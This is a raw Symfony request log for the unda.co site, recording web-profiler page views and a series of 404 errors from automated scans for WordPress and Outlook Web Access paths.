[2025-12-20 04:50:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
[2025-12-20 04:51:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=cache","method":"GET"} []
[2025-12-20 04:51:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 05:00:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a","method":"GET"} []
[2025-12-20 05:00:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 05:07:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3?panel=events","method":"GET"} []
[2025-12-20 05:07:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 05:08:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=validator","method":"GET"} []
[2025-12-20 05:08:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 05:08:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 05:08:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 05:12:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=cache","method":"GET"} []
[2025-12-20 05:12:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 05:30:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:35:30] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1dc617","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/1dc617/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 05:35:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 05:40:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
[2025-12-20 05:40:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 05:42:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:42:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:42:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:42:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:43:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 05:44:31] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"14b2f9","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/14b2f9/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-20 05:44:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-20 05:46:34] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 05:50:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 05:50:24] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"fbcff2","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/fbcff2","method":"GET"} []
[2025-12-20 05:50:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 05:50:32] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 05:50:45] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"7408d6","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/7408d6","method":"GET"} []
[2025-12-20 05:50:54] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4990f9","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/4990f9","method":"GET"} []
[2025-12-20 05:53:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
[2025-12-20 05:53:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 06:00:37] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b1be4f","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b1be4f/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-20 06:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-20 06:03:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d40cdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d40cdc?panel=db","method":"GET"} []
[2025-12-20 06:03:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 06:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=time","method":"GET"} []
[2025-12-20 06:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 06:05:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 06:06:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"96a686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/96a686","method":"GET"} []
[2025-12-20 06:06:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 06:08:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=time","method":"GET"} []
[2025-12-20 06:08:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 06:12:25] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 06:12:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 06:13:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?panel=config","method":"GET"} []
[2025-12-20 06:13:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 06:13:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=twig","method":"GET"} []
[2025-12-20 06:13:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 06:18:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 06:18:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?group=1&panel=db","method":"GET"} []
[2025-12-20 06:18:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-20 06:20:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
